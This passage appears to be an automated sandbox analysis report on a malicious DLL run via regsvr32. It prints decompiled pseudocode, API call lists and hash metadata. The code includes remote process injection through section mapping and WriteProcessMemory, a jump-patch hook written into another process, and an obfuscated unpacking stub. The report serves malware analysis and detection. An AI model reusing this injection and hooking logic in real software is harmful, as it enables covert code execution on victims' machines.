						_t13 = E0008A4BF(_t41, 0);
						continue;
					}
					__eflags = _t41 - _v28;
					if(_t41 >= _v28) {
						goto L9;
					}
					goto L4;
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t20 =  *0x9e6e8; // 0xe9ffa8
				_v28 = _t20;
				_t22 = E0008A6A9(_t41, _t61,  &_v16);
				_v20 = _t22;
				if(_t22 != 0) {
					_t23 = GetCurrentProcess();
					_t24 = GetCurrentThread();
					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0x9e6d0, 0, 0, 2);
					E0008980C(0x9e6e0);
					_t64 = E00081A1B( &_v28, E00081226, _t71);
					__eflags = _t64;
					if(_t64 >= 0) {
						_push(0);
						_push( *0x9e760);
						_t51 = 0x27;
						E00089F06(_t51);
					}
				} else {
					_t64 = _t61 | 0xffffffff;
				}
				_t29 =  *0x9e684; // 0xe9f8f0
				 *((intOrPtr*)(_t29 + 0x30))( *0x9e6d0);
				_t48 =  *0x9e6dc; // 0x1d8
				 *0x9e6d0 = 0;
				E0008A4DB(_t48);
				E0008861A( &_v24, 0);
				_t16 = _t64;
				goto L13;
			}

0x00081c68
0x00081c75
0x00081c77
0x00081c7e
0x00081ce4
0x00081c8b
0x00081c90
0x00081c96
0x00081c9b
0x00081ca1
0x00081ca3
0x00081ca7
0x00081d15
0x00081d17
0x00081d99
0x00081d9f
0x00081d9f
0x00081ca9
0x00081cb1
0x00081cb1
0x00081cbd
0x00081cc3
0x00081cc5
0x00000000
0x00000000
0x00081cc7
0x00081cd1
0x00081cd7
0x00081cdd
0x00081cdf
0x00000000
0x00081cdf
0x00081cab
0x00081caf
0x00000000
0x00000000
0x00000000
0x00081caf
0x00081cee
0x00081cef
0x00081cf0
0x00081cf1
0x00081cf2
0x00081cf7
0x00081d01
0x00081d06
0x00081d0e
0x00081d29
0x00081d2c
0x00081d36
0x00081d41
0x00081d54
0x00081d56
0x00081d58
0x00081d5a
0x00081d5b
0x00081d63
0x00081d64
0x00081d6a
0x00081d10
0x00081d10
0x00081d10
0x00081d6b
0x00081d76
0x00081d79
0x00081d7f
0x00081d85
0x00081d90
0x00081d97
0x00000000

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5440ee2a19d37476f6d76c6c202a165a4a6b38181fe6b17b305cff97d8016c0a
Instruction ID: b7eecfca9752b51bd3878614f3e3ca223f58aa9d07610ca166e7e1ee13e62024
Opcode Fuzzy Hash: 5440ee2a19d37476f6d76c6c202a165a4a6b38181fe6b17b305cff97d8016c0a
Instruction Fuzzy Hash: A431C232604340AFE754FFA4EC859AA77ADFB943A0F54092BF581C32E2DE389C058756

Uniqueness

Uniqueness Score: -1.00%

Function 00081B2D, Relevance: 6.1, APIs: 4, Instructions: 97
threadCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00081B2D(void* __eflags, void* __fp0) {
				char _v24;
				char _v28;
				void* _t12;
				intOrPtr _t14;
				void* _t15;
				intOrPtr _t16;
				void* _t17;
				void* _t19;
				void* _t20;
				char _t24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t33;
				intOrPtr _t38;
				intOrPtr _t40;
				void* _t41;
				intOrPtr _t46;
				void* _t48;
				intOrPtr _t51;
				void* _t61;
				void* _t71;

				_t71 = __fp0;
				_t38 =  *0x9e6f4; // 0x1d4
				_t12 = E0008A4BF(_t38, 0);
				while(_t12 < 0) {
					E0008980C( &_v28);
					_t40 =  *0x9e700; // 0x0
					_t14 =  *0x9e704; // 0x0
					_t41 = _t40 + 0x3840;
					asm("adc eax, ebx");
					__eflags = _t14 - _v24;
					if(__eflags > 0) {
						L13:
						_t15 = 0;
					} else {
						if(__eflags < 0) {
							L4:
							_t16 =  *0x9e684; // 0xe9f8f0
							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0x9e6ec, 0);
							__eflags = _t17;
							if(_t17 == 0) {
								break;
							} else {
								_t33 =  *0x9e684; // 0xe9f8f0
								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
								_t51 =  *0x9e6f4; // 0x1d4
								__eflags = 0;
								_t12 = E0008A4BF(_t51, 0);
								continue;
							}
						} else {
							__eflags = _t41 - _v28;
							if(_t41 >= _v28) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
					L12:
					return _t15;
				}
				E0008980C(0x9e700);
				_t19 = GetCurrentProcess();
				_t20 = GetCurrentThread();
				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0x9e6ec, 0, 0, 2);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 =  *0x9e6e8; // 0xe9ffa8
				_v28 = _t24;
				_t61 = E00081A1B( &_v28, E0008131E, _t71);
				if(_t61 >= 0) {
					_push(0);
					_push( *0x9e760);
					_t48 = 0x27;
					E00089F06(_t48);
				}
				if(_v24 != 0) {
					E00086890( &_v24);
				}
				_t26 =  *0x9e684; // 0xe9f8f0
				 *((intOrPtr*)(_t26 + 0x30))( *0x9e6ec);
				_t28 =  *0x9e758; // 0x0
				 *0x9e6ec = 0;
				_t29 =  !=  ? 1 : _t28;
				_t46 =  *0x9e6f4; // 0x1d4
				 *0x9e758 =  !=  ? 1 : _t28;
				E0008A4DB(_t46);
				_t15 = _t61;
				goto L12;
			}

0x00081b2d
0x00081b33
0x00081b41
0x00081baf
0x00081b4e
0x00081b53
0x00081b59
0x00081b5e
0x00081b64
0x00081b66
0x00081b6a
0x00081c64
0x00081c64
0x00081b70
0x00081b70
0x00081b7c
0x00081b7c
0x00081b88
0x00081b8e
0x00081b90
0x00000000
0x00081b92
0x00081b92
0x00081b9c
0x00081ba2
0x00081ba8
0x00081baa
0x00000000
0x00081baa
0x00081b72
0x00081b72
0x00081b76
0x00000000
0x00000000
0x00000000
0x00000000
0x00081b76
0x00081b70
0x00081c5d
0x00081c63
0x00081c63
0x00081bb8
0x00081bcc
0x00081bcf
0x00081bd9
0x00081be5
0x00081bef
0x00081bf0
0x00081bf1
0x00081bf2
0x00081bf7
0x00081c00
0x00081c04
0x00081c06
0x00081c07
0x00081c0f
0x00081c10
0x00081c16
0x00081c1b
0x00081c21
0x00081c21
0x00081c26
0x00081c31
0x00081c34
0x00081c3c
0x00081c48
0x00081c4b
0x00081c51
0x00081c56
0x00081c5b
0x00000000

APIs

GetCurrentProcess.KERNEL32(0009E6EC,00000000,00000000,00000002), ref: 00081BCC
GetCurrentThread.KERNEL32(00000000), ref: 00081BCF
GetCurrentProcess.KERNEL32(00000000), ref: 00081BD6
DuplicateHandle.KERNEL32 ref: 00081BD9

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: Current$Process$DuplicateHandleThread
String ID:
API String ID: 3566409357-0
Opcode ID: f5b9d26db10020dcd7cac68cf43cf7bf7c508de2d61b361089cb2e0ad45b02f1
Instruction ID: c21506e0fc88ba440ea6bcc6b6f55abd04b465cff164c1f0cab10b664a380183
Opcode Fuzzy Hash: f5b9d26db10020dcd7cac68cf43cf7bf7c508de2d61b361089cb2e0ad45b02f1
Instruction Fuzzy Hash: F13184716043519FF704FFA4EC899AA77A9FF94390B04496EF681C72A2DB389C05CB52

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: regsvr32.exe PID: 2528 Parent PID: 2968 regsvr32.exeCOMMON

Executed Functions

Function 1000C6C0, Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 200
nativeregistrymemoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E1000C6C0(void* __ecx, intOrPtr __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				long _v24;
				long _v28;
				void* _v32;
				intOrPtr _v36;
				long _v40;
				void* _v44;
				char _v56;
				char _v72;
				struct _WNDCLASSEXA _v120;
				void* _t69;
				intOrPtr _t75;
				struct HWND__* _t106;
				intOrPtr* _t113;
				struct _EXCEPTION_RECORD _t116;
				void* _t126;
				void* _t131;
				intOrPtr _t134;
				void* _t140;
				void* _t141;

				_t69 =  *0x1001e688; // 0x2e50590
				_t126 = __ecx;
				_t134 = __edx;
				_t116 = 0;
				_v36 = __edx;
				_v16 = 0;
				_v44 = 0;
				_v40 = 0;
				_v12 = 0;
				_v8 = 0;
				_v24 = 0;
				_v20 = __ecx;
				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
					E1000E23E(0x1f4);
					_t116 = 0;
				}
				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
				_v28 = _t116;
				if( *_t113 != 0x4550) {
					L12:
					if(_v8 != 0) {
						_t75 =  *0x1001e780; // 0x2ecfbc8
						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
						_v8 = _v8 & 0x00000000;
					}
					L14:
					if(_v12 != 0) {
						NtUnmapViewOfSection(GetCurrentProcess(), _v12);
					}
					if(_v16 != 0) {
						NtClose(_v16);
					}
					return _v8;
				}
				_v44 =  *((intOrPtr*)(_t113 + 0x50));
				if(NtCreateSection( &_v16, 0xe, _t116,  &_v44, 0x40, 0x8000000, _t116) < 0) {
					goto L12;
				}
				_v120.style = 0xb;
				_v120.cbSize = 0x30;
				_v120.lpszClassName =  &_v56;
				asm("movsd");
				_v120.lpfnWndProc = DefWindowProcA;
				asm("movsd");
				asm("movsd");
				asm("movsb");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				_v120.cbWndExtra = 0;
				_v120.lpszMenuName = 0;
				_v120.cbClsExtra = 0;
				_v120.hInstance = 0;
				if(RegisterClassExA( &_v120) != 0) {
					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0); // executed
					if(_t106 != 0) {
						DestroyWindow(_t106); // executed
						UnregisterClassA( &_v56, 0);
					}
				}
				if(NtMapViewOfSection(_v16, GetCurrentProcess(),  &_v12, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
					_t126 = _v20;
					goto L12;
				} else {
					_t126 = _v20;
					if(NtMapViewOfSection(_v16, _t126,  &_v8, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
						goto L12;
					}
					_t140 = E10008669( *0x1001e688, 0x1ac4);
					_v32 = _t140;
					if(_t140 == 0) {
						goto L12;
					}
					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
					_t131 = VirtualAllocEx(_t126, 0, 0x1ac4, 0x1000, 4);
					WriteProcessMemory(_v20, _t131, _t140, 0x1ac4,  &_v28);
					E1000861A( &_v32, 0x1ac4);
					_t141 =  *0x1001e688; // 0x2e50590
					 *0x1001e688 = _t131;
					E100086E1(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
					E1000C63F(_v12, _v8, _v36);
					 *0x1001e688 = _t141;
					goto L14;
				}
			}

APIs

NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CEC), ref: 1000C733
RegisterClassExA.USER32 ref: 1000C785
CreateWindowExA.USER32 ref: 1000C7B0
DestroyWindow.USER32 ref: 1000C7BB
UnregisterClassA.USER32(?,00000000), ref: 1000C7C6
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C7E2
NtMapViewOfSection.NTDLL(?,00000000), ref: 1000C7EC
NtMapViewOfSection.NTDLL(?,1000CBA0,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C813
VirtualAllocEx.KERNEL32(1000CBA0,00000000,00001AC4,00001000,00000004), ref: 1000C856
WriteProcessMemory.KERNEL32(1000CBA0,00000000,00000000,00001AC4,?), ref: 1000C86F

Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660

GetCurrentProcess.KERNEL32(00000000), ref: 1000C8DB
NtUnmapViewOfSection.NTDLL(00000000), ref: 1000C8E2
NtClose.NTDLL(00000000), ref: 1000C8F5

Strings

cdcdwqwqwq, xrefs: 1000C76A
0, xrefs: 1000C74D
sadccdcdsasa, xrefs: 1000C73E

Memory Dump Source

Source File: 00000009.00000002.554724800.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.554640599.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Section$ProcessView$ClassCreateCurrentWindow$AllocCloseDestroyFreeHeapMemoryRegisterUnmapUnregisterVirtualWrite
String ID: 0$cdcdwqwqwq$sadccdcdsasa
API String ID: 2002808388-2319545179
Opcode ID: 142da9db68d52c38d717a02c0839c2ca2f1210e5572982ee18d12491895b5d42
Instruction ID: 6d8830cee459303ec09d51d2f03be3a40535ffb0f4457941fb28a5827401908c
Opcode Fuzzy Hash: 142da9db68d52c38d717a02c0839c2ca2f1210e5572982ee18d12491895b5d42
Instruction Fuzzy Hash: 50711A71900259AFEB11CF95CC89EAEBBB9FF49740F118069F605B7290D770AE04CB64

Uniqueness

Uniqueness Score: -1.00%

Function 1000CB77, Relevance: 7.6, APIs: 5, Instructions: 105
nativeCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E1000CB77(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
				long _v8;
				long _v12;
				void* _v16;
				intOrPtr _v23;
				void _v24;
				long _v28;
				void* _v568;
				void _v744;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t32;
				intOrPtr _t33;
				intOrPtr _t35;
				void* _t39;
				intOrPtr _t43;
				void* _t63;
				long _t65;
				void* _t70;
				void** _t73;
				void* _t74;

				_t73 = __edx;
				_t63 = __ecx;
				_t74 = 0;
				if(E1000C4CE(__ecx, __edx, __edx, 0) != 0) {
					_t39 = E1000C6C0( *((intOrPtr*)(__edx)), _a4); // executed
					_t74 = _t39;
					if(_t74 != 0) {
						memset( &_v744, 0, 0x2cc);
						_v744 = 0x10002;
						_push( &_v744);
						_t43 =  *0x1001e684; // 0x2ecfaa0
						_push(_t73[1]);
						if( *((intOrPtr*)(_t43 + 0xa8))() != 0) {
							_t70 = _v568;
							_v12 = _v12 & 0x00000000;
							_v24 = 0xe9;
							_t65 = 5;
							_v23 = _t74 - _t70 - _a4 + _t63 + 0xfffffffb;
							_v8 = _t65;
							_v16 = _t70;
							if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t73, _v568,  &_v24, _t65,  &_v8) < 0) {
								L6:
								_t74 = 0;
							} else {
								_v28 = _v28 & 0x00000000;
								if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, _v12,  &_v28) < 0) {
									goto L6;
								}
							}
						}
					}
				}
				_t32 =  *0x1001e77c; // 0x0
				if(_t32 != 0) {
					FreeLibrary(_t32);
					 *0x1001e77c =  *0x1001e77c & 0x00000000;
				}
				_t33 =  *0x1001e784; // 0x0
				if(_t33 != 0) {
					_t35 =  *0x1001e684; // 0x2ecfaa0
					 *((intOrPtr*)(_t35 + 0x10c))(_t33);
					E1000861A(0x1001e784, 0xfffffffe);
				}
				return _t74;
			}

APIs

Part of subcall function 1000C4CE: LoadLibraryW.KERNEL32 ref: 1000C5C6
Part of subcall function 1000C4CE: memset.MSVCRT ref: 1000C605

FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CC73

Part of subcall function 1000C6C0: NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CEC), ref: 1000C733
Part of subcall function 1000C6C0: RegisterClassExA.USER32 ref: 1000C785
Part of subcall function 1000C6C0: CreateWindowExA.USER32 ref: 1000C7B0
Part of subcall function 1000C6C0: DestroyWindow.USER32 ref: 1000C7BB
Part of subcall function 1000C6C0: UnregisterClassA.USER32(?,00000000), ref: 1000C7C6

memset.MSVCRT ref: 1000CBB8
NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC22
NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC3F
NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CC60

Memory Dump Source

Source File: 00000009.00000002.554724800.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.554640599.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: MemoryVirtual$ClassCreateLibraryProtectWindowmemset$DestroyFreeLoadRegisterSectionUnregisterWrite
String ID:
API String ID: 317994034-0
Opcode ID: e9ba61dee699041d89b454d2aaebe348e1d06309881bf86e54450125777bed9c
Instruction ID: ec983c159b6771507b2e65583ae913044cb7e5fe8140f97fdbe63d1be5c924e3
Opcode Fuzzy Hash: e9ba61dee699041d89b454d2aaebe348e1d06309881bf86e54450125777bed9c
Instruction Fuzzy Hash: 1E310C76A00219AFFB01DFA5CD89F9EB7B8EF08790F114165F504D61A4D771EE448B90

Uniqueness

Uniqueness Score: -1.00%

Function 02112C41, Relevance: 5.1, APIs: 3, Instructions: 582COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.552434410.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55a69c6a80807367d2ee6713c95060d97be892416f160e53a89ffe9f7bcefe76
Instruction ID: 78802ea5e807aa6c62b9eb984ca94236bc2f0651ff6fb5d1ba8ad3ebaecf6b6a
Opcode Fuzzy Hash: 55a69c6a80807367d2ee6713c95060d97be892416f160e53a89ffe9f7bcefe76
Instruction Fuzzy Hash: 75426A72D00619DFEF04CFA0C9897AABBB5FF54311F1850AADD0DAE149C73815A4CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 02113073, Relevance: 4.8, APIs: 3, Instructions: 306comlibraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(02112C25,02112C25,458F0000,?,00000000), ref: 021131F1
OleUninitialize.OLE32(02112C25), ref: 02113354

Memory Dump Source

Source File: 00000009.00000002.552434410.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: true

Similarity

API ID: LibraryLoadUninitialize
String ID:
API String ID: 2978721001-0
Opcode ID: 63462bf202cfa106886da0fd231bacab201c4396b8d2cbd2302e506409071efd
Instruction ID: 553cb69c8144133dfe2dae960c88df49ede9213369dbaf8468829c9b1b0a7b49
Opcode Fuzzy Hash: 63462bf202cfa106886da0fd231bacab201c4396b8d2cbd2302e506409071efd
Instruction Fuzzy Hash: 08D16972C00615DFEF04CFA0C9897AABBB5FF58311F0854AADD4DAB149C73815A4CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 02111424, Relevance: 3.3, APIs: 2, Instructions: 272
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 50%

			E02111424(signed int __ebx, void* __ecx, signed int __edx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t154;
				int _t155;
				signed int _t158;
				int _t159;
				signed int _t160;
				intOrPtr _t163;
				signed int _t164;
				signed int _t166;
				signed int _t169;
				signed int _t171;
				intOrPtr _t175;
				signed int _t176;
				intOrPtr _t177;
				signed int _t179;
				signed int _t182;
				signed int _t183;
				signed int _t185;
				signed int _t188;
				signed int _t189;
				signed int _t190;
				void* _t192;
				signed int _t193;
				signed int _t194;
				signed int _t212;
				signed int _t215;
				signed int _t224;
				signed int _t225;
				void* _t226;
				void* _t227;
				signed int _t234;
				signed int _t237;
				void* _t244;
				signed int* _t246;

				_t234 = __esi;
				_t224 = __edi;
				_t212 = __edx;
				_t155 = E0211463B(_t154, __ebx, __ecx, __edi);
				_push(__ecx);
				_t188 = __ebx | __ebx;
				_t185 = _t188;
				_pop(_t189);
				if(_t188 != 0) {
					if( *(_t185 + 0x4358a4) == 0) {
						_t183 =  *((intOrPtr*)(_t185 + 0x4410a0))(0, 1,  *((intOrPtr*)(_t185 + 0x435888)), 0xf,  *((intOrPtr*)(_t185 + 0x4353a6)), 0x1c4, 0x800);
						 *_t246 = _t189;
						 *(_t185 + 0x4358a4) = 0 ^ _t183;
						_t189 = 0;
					}
					_push(4);
					_push(0x1000);
					_push( *((intOrPtr*)(_t185 + 0x435280)));
					_push(0);
					if( *(_t185 + 0x435585) == 0) {
						_t182 =  *((intOrPtr*)(_t185 + 0x441064))(_t185 + 0x43546a);
						 *(_t244 - 8) = _t212;
						 *(_t185 + 0x435585) =  *(_t185 + 0x435585) & 0x00000000;
						 *(_t185 + 0x435585) =  *(_t185 + 0x435585) ^ (_t212 & 0x00000000 | _t182);
						_t212 =  *(_t244 - 8);
					}
					_t155 = VirtualAlloc();
				}
				 *_t17 = _t155;
				 *((intOrPtr*)(_t185 + 0x4354d2)) = 2;
				if( *(_t185 + 0x435014) == 0) {
					_t179 =  *((intOrPtr*)(_t185 + 0x441054))(_t185 + 0x435702, _t155);
					 *(_t244 - 4) = _t224;
					 *(_t185 + 0x435014) = 0 ^ _t179;
					_t224 =  *(_t244 - 4);
					_t155 = (_t179 & 0x00000000) +  *_t246;
					_t246 =  &(_t246[1]);
				}
				 *(_t185 + 0x4350dc) =  *(_t185 + 0x4350dc) & 0x00000000;
				 *(_t185 + 0x4350dc) =  *(_t185 + 0x4350dc) ^ _t234 & 0x00000000 ^ _t155;
				_t237 = _t234;
				if( *(_t185 + 0x4350b0) > 0) {
					if( *((intOrPtr*)(_t185 + 0x43590c)) == 0) {
						_t177 =  *((intOrPtr*)(_t185 + 0x4410a0))(0, 1,  *((intOrPtr*)(_t185 + 0x4351af)),  *((intOrPtr*)(_t185 + 0x435422)), 0x1d7, 0xf8,  *((intOrPtr*)(_t185 + 0x43539e)));
						 *(_t244 - 8) = _t237;
						 *((intOrPtr*)(_t185 + 0x43590c)) = _t177;
						_t237 =  *(_t244 - 8);
					}
					_push(_t185 + 0x4354d2);
					_push(0x40);
					if( *(_t185 + 0x435968) == 0) {
						_t176 =  *((intOrPtr*)(_t185 + 0x441058))();
						 *(_t185 + 0x435968) =  *(_t185 + 0x435968) & 0x00000000;
						 *(_t185 + 0x435968) =  *(_t185 + 0x435968) | _t189 -  *_t246 | _t176;
						_t189 = _t189;
					}
					_t175 =  *((intOrPtr*)(_t185 + 0x441044))(_t185 + 0x43501c, _t185 + 0x4354ea,  *(_t185 + 0x435462));
					 *_t246 = _t189;
					 *((intOrPtr*)(_t185 + 0x4359f1)) = _t175;
					_t189 = 0;
					_t155 = VirtualProtect( *(_t185 + 0x4350b0), ??, ??, ??);
				}
				if(_t155 != _t185) {
					if( *(_t185 + 0x435366) == 0) {
						_t171 =  *((intOrPtr*)(_t185 + 0x441068))(_t185 + 0x4357ae);
						 *(_t185 + 0x435366) =  *(_t185 + 0x435366) & 0x00000000;
						 *(_t185 + 0x435366) =  *(_t185 + 0x435366) ^ _t224 & 0x00000000 ^ _t171;
						_t224 = _t224;
					}
					_push( *((intOrPtr*)(_t185 + 0x43574e)));
					_push( *((intOrPtr*)(_t185 + 0x435288)));
					if( *(_t185 + 0x435248) == 0) {
						_t169 =  *((intOrPtr*)(_t185 + 0x441064))(_t185 + 0x4358c8);
						 *(_t244 - 8) = _t212;
						 *(_t185 + 0x435248) =  *(_t185 + 0x435248) & 0x00000000;
						 *(_t185 + 0x435248) =  *(_t185 + 0x435248) ^ (_t212 ^  *(_t244 - 8) | _t169);
						_t212 =  *(_t244 - 8);
					}
					_t155 = E02113726(_t185, _t189, _t212, _t224, _t237); // executed
				}
				 *(_t244 - 4) = _t212;
				_t190 = 0 ^  *(_t185 + 0x435462);
				_t215 =  *(_t244 - 4);
				 *(_t244 - 8) = _t155;
				_t225 = 0 ^  *(_t185 + 0x4350b0);
				_t158 =  *(_t244 - 8);
				if( *((intOrPtr*)(_t185 + 0x4357a2)) == 0) {
					_t158 =  *((intOrPtr*)(_t185 + 0x441060))();
					 *_t79 = _t158;
					_push( *(_t244 - 8));
					_pop( *_t81);
					 *_t82 = _t190;
					_t190 = (_t190 & 0x00000000) +  *(_t244 - 4);
				}
				_t192 = _t225 | _t225;
				_t226 = _t192;
				_t193 = _t190;
				if(_t192 != 0) {
					if( *(_t185 + 0x435520) == 0) {
						_t158 =  *((intOrPtr*)(_t185 + 0x4410a0))( *((intOrPtr*)(_t185 + 0x435681)),  *((intOrPtr*)(_t185 + 0x4353d2)),  *((intOrPtr*)(_t185 + 0x4354ba)),  *((intOrPtr*)(_t185 + 0x435796)),  *((intOrPtr*)(_t185 + 0x4354a2)), 0xdf, 0x400, _t193);
						 *(_t244 - 8) = _t193;
						 *(_t185 + 0x435520) =  *(_t185 + 0x435520) & 0x00000000;
						 *(_t185 + 0x435520) =  *(_t185 + 0x435520) | _t193 & 0x00000000 ^ _t158;
						_t193 =  *_t246;
						_t246 =  &(_t246[1]);
					}
					_push(_t226);
					if( *(_t185 + 0x4353c6) == 0) {
						_t158 =  *((intOrPtr*)(_t185 + 0x44105c))(_t193);
						 *(_t185 + 0x4353c6) =  *(_t185 + 0x4353c6) & 0x00000000;
						 *(_t185 + 0x4353c6) =  *(_t185 + 0x4353c6) ^ _t237 & 0x00000000 ^ _t158;
						_t237 = _t237;
						_t193 = (_t193 & 0x00000000) +  *_t246;
						_t246 = _t246 - 0xfffffffc;
					}
					_t158 = E02114495(_t158, _t185, _t193, _t215, _t226, _t237);
				}
				 *_t246 =  *_t246 ^ _t158;
				_t159 = _t158;
				if( *(_t185 + 0x435855) == 0) {
					_t166 =  *((intOrPtr*)(_t185 + 0x4410a4))( *((intOrPtr*)(_t185 + 0x435615)), _t159);
					 *(_t244 - 8) = _t226;
					 *(_t185 + 0x435855) =  *(_t185 + 0x435855) & 0x00000000;
					 *(_t185 + 0x435855) =  *(_t185 + 0x435855) ^ (_t226 -  *(_t244 - 8) | _t166);
					_t226 =  *(_t244 - 8);
					_pop( *_t113);
					_t193 =  *(_t244 - 8);
					 *_t115 = _t193;
					_t159 = _t166 & 0x00000000 ^  *(_t244 - 4);
				}
				_t160 = memset(_t226, _t159, _t193 << 0);
				_t227 = _t226 + _t193;
				_t194 = 0;
				if( *(_t185 + 0x4353ce) == 0) {
					_t160 =  *((intOrPtr*)(_t185 + 0x441068))(_t185 + 0x4359ac);
					 *(_t244 - 4) = _t215;
					 *(_t185 + 0x4353ce) =  *(_t185 + 0x4353ce) & 0x00000000;
					 *(_t185 + 0x4353ce) =  *(_t185 + 0x4353ce) | _t215 -  *(_t244 - 4) | _t160;
					_t215 =  *(_t244 - 4);
				}
				if( *((intOrPtr*)(_t185 + 0x43574e)) != _t185) {
					if( *(_t185 + 0x4357d6) == 0) {
						_t164 =  *((intOrPtr*)(_t185 + 0x441058))();
						 *(_t244 - 8) = _t237;
						 *(_t185 + 0x4357d6) = 0 ^ _t164;
						_t237 =  *(_t244 - 8);
					}
					_push( *((intOrPtr*)(_t185 + 0x43574e)));
					if( *((intOrPtr*)(_t185 + 0x435177)) == 0) {
						_t163 =  *((intOrPtr*)(_t185 + 0x441064))(_t185 + 0x4351ff);
						 *(_t244 - 8) = _t194;
						 *((intOrPtr*)(_t185 + 0x435177)) = _t163;
						_t194 =  *(_t244 - 8);
					}
					_t161 = E0211242A(_t185, _t194, _t215, _t227, _t237); // executed
					if( *((intOrPtr*)(_t185 + 0x43536a)) == 0) {
						 *_t144 =  *((intOrPtr*)(_t185 + 0x4410a8))(0,  *((intOrPtr*)(_t185 + 0x43549e)));
						 *_t146 =  *(_t244 - 4);
					}
					_t160 = E02113658(_t161, _t185, _t215, _t227, _t237,  *((intOrPtr*)(_t185 + 0x43574e)));
				}
				 *(_t244 - 8) = _t194;
				 *_t151 = _t215 & 0x00000000 ^ (_t194 & 0x00000000 |  *(_t185 + 0x4351a7));
				 *_t153 =  *(_t244 - 4);
				asm("popad");
				return _t160;
			}

0x02111424
0x02111424
0x02111424
0x02111424
0x02111429
0x0211142c
0x0211142e
0x02111430
0x02111431
0x0211143a
0x02111458
0x02111460
0x02111467
0x0211146d
0x0211146d
0x0211146e
0x02111470
0x02111475
0x0211147b
0x02111484
0x0211148d
0x02111493
0x0211149b
0x021114a2
0x021114a8
0x021114a8
0x021114ab
0x021114ab
0x021114b2
0x021114b8
0x021114c9
0x021114d3
0x021114d9
0x021114e0
0x021114e6
0x021114ef
0x021114f2
0x021114f2
0x021114fb
0x02111502
0x02111508
0x02111510
0x0211151d
0x0211153f
0x02111545
0x0211154c
0x02111552
0x02111552
0x0211155b
0x0211155c
0x02111565
0x02111567
0x02111573
0x0211157a
0x02111580
0x02111580
0x02111595
0x0211159d
0x021115a4
0x021115aa
0x021115b1
0x021115b1
0x021115b9
0x021115c2
0x021115cb
0x021115d7
0x021115de
0x021115e4
0x021115e4
0x021115e5
0x021115eb
0x021115f8
0x02111601
0x02111607
0x0211160f
0x02111616
0x0211161c
0x0211161c
0x0211161f
0x0211161f
0x02111624
0x0211162f
0x02111631
0x02111634
0x0211163f
0x02111641
0x0211164b
0x0211164e
0x02111655
0x02111658
0x0211165b
0x02111667
0x0211166a
0x0211166a
0x02111670
0x02111672
0x02111674
0x02111675
0x02111682
0x021116ad
0x021116b3
0x021116bb
0x021116c2
0x021116cd
0x021116d0
0x021116d0
0x021116d3
0x021116db
0x021116de
0x021116ea
0x021116f1
0x021116f7
0x021116fe
0x02111701
0x02111701
0x02111704
0x02111704
0x0211170a
0x0211170d
0x02111715
0x0211171f
0x02111725
0x0211172d
0x02111734
0x0211173a
0x0211173d
0x02111740
0x02111749
0x0211174c
0x0211174c
0x0211174f
0x0211174f
0x0211174f
0x02111758
0x02111761
0x02111767
0x0211176f
0x02111776
0x0211177c
0x0211177c
0x02111785
0x0211178e
0x02111790
0x02111796
0x0211179d
0x021117a3
0x021117a3
0x021117a6
0x021117b3
0x021117bc
0x021117c2
0x021117c9
